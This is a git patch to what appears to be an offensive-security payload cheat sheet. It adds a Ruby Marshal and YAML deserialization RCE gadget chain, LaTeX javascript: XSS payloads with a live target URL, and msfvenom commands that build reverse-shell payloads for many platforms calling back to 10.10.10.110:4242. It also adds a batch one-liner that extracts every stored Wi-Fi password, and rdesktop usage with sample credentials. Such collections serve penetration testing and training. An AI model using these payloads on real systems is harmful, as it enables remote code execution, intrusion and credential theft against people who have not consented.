From 2d5b4f21933d632c489baa575c0d3537982a8690 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 3 Mar 2019 16:31:17 +0100 Subject: [PATCH] Meterpreter generate + LaTeK XSS + Ruby Yaml --- Insecure deserialization/Ruby.md | 25 +++++++++++++++++++ LaTeX injection/README.md | 10 ++++++++ .../Metasploit - Cheatsheet.md | 16 ++++++++++++ .../Windows - Privilege Escalation.md | 6 +++++ .../Windows - Using credentials.md | 3 ++- Upload insecure files/README.md | 3 +++ 6 files changed, 62 insertions(+), 1 deletion(-) diff --git a/Insecure deserialization/Ruby.md b/Insecure deserialization/Ruby.md index bf338863..62635261 100644 --- a/Insecure deserialization/Ruby.md +++ b/Insecure deserialization/Ruby.md @@ -1,12 +1,37 @@ # Ruby Deserialization +## Marshal.load + Script to generate and verify the deserialization gadget chain against Ruby 2.0 through to 2.5 ```ruby for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done ``` +## Yaml.load + +Vulnerable code +```ruby +require "yaml" +YAML.load(File.read("p.yml")) +``` + +Exploitation code +```ruby +--- !ruby/object:Gem::Requirement +requirements: + !ruby/object:Gem::DependencyList + specs: + - !ruby/object:Gem::Source::SpecificFile + spec: &1 !ruby/object:Gem::StubSpecification + loaded_from: "|id 1>&2" + - !ruby/object:Gem::Source::SpecificFile + spec: +``` + + ## References - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) +- [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/) - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) \ No newline at end of file diff --git a/LaTeX injection/README.md b/LaTeX injection/README.md index 6a02010f..5cce2b7a 100644 --- a/LaTeX injection/README.md +++ b/LaTeX injection/README.md @@ -66,6 +66,16 @@ If you get any LaTex error, consider using base64 to get the result without bad \input{|"/bin/hostname"} ``` +## Cross Site Scripting + +From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) +```bash +\url{javascript:alert(1)} +\href{javascript:alert(1)}{placeholder} +``` + +Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{Frogs%20find%20bugs}$` + ## References * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/) diff --git a/Methodology and Resources/Metasploit - Cheatsheet.md b/Methodology and Resources/Metasploit - Cheatsheet.md index 6438f7a0..013d5ac6 100644 --- a/Methodology and Resources/Metasploit - Cheatsheet.md +++ b/Methodology and Resources/Metasploit - Cheatsheet.md @@ -45,6 +45,21 @@ exploit -j ## Meterpreter - Basic +### Generate a meterpreter + +```powershell +$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe +$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho +$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp +$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp +$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war +$ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py +$ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh +$ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl +``` + ### SYSTEM / Administrator privilege ```powershell @@ -161,3 +176,4 @@ Add-WebTransport -Url http(s)://:/ -RetryWait 10 -RetryTotal 3 ## References * [Multiple transports in a meterpreter payload - ionize](https://ionize.com.au/multiple-transports-in-a-meterpreter-payload/) +* [Creating Metasploit Payloads - Peleus](https://netsec.ws/?p=331) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index d9c96f89..9a414df1 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -258,6 +258,12 @@ Get Cleartext Pass netsh wlan show profile key=clear ``` +Oneliner method to extract wifi passwords from all the access point. + +````batch +cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on +``` + ## Processes Enumeration and Tasks What processes are running? diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index e5486951..ffe4ae87 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -93,7 +93,8 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 ```powershell python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 -rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 +rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 -g 70% +# -g : the screen will take up 70% of your actual screen size ``` Note: you may need to enable it with the following command diff --git a/Upload insecure files/README.md b/Upload insecure files/README.md index 35d7fb5c..809fba82 100644 --- a/Upload insecure files/README.md +++ b/Upload insecure files/README.md @@ -2,6 +2,9 @@ Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. +## Tools +- [Fuxploider](https://github.com/almandin/fuxploider) + ## Exploits ### PHP Extension